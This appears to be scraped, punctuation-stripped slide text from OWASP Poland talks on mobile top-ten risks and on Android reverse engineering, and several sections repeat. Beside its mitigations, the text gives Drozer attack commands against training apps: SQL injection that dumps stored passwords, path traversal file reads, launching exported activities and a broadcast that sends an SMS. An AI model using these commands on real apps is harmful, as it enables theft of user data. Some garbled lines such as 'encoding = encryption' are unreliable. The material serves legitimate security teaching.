Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
